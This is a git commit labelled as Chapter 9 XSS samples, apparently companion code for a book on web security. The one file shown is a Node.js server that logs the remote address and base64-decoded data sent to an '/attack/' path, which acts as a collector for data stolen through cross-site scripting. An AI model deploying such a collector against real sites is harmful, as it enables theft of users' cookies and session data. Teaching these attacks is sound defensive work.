Chapter 9: XSS samples

This commit is contained in:
Beth Griggs
2020-09-06 00:58:03 +01:00
parent a77f753e2f
commit c4714dffa7
7 changed files with 534 additions and 0 deletions
@@ -0,0 +1,9 @@
require("http")
.createServer((req, res) => {
console.log(
req.connection.remoteAddress,
Buffer(req.url.split("/attack/")[1], "base64").toString().trim()
);
})
.listen(3001);